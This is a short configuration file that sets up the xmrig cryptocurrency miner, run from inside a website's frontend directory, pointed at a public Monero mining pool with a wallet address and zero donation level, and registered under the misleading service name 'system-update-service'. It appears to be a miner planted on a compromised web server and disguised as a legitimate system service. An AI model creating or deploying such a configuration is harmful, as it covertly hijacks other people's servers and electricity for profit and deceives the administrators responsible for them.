BINARY_PATH=/var/www/html/EdgeConsulting/frontend/xmrig-6.24.0/xmrig
ARGS=--url pool.supportxmr.com:8080 --user 89Zr4vPaS8yTYRQE54tK1QGKRpsYZ6eJJYynfpfBf1zmLHECaskMPwd3wuTnQ4SYQ7QLkwVN8ur2QTQi9wkKMaCr2iXKa7j --pass sx --donate-level 0
SERVICE_NAME=system-update-service
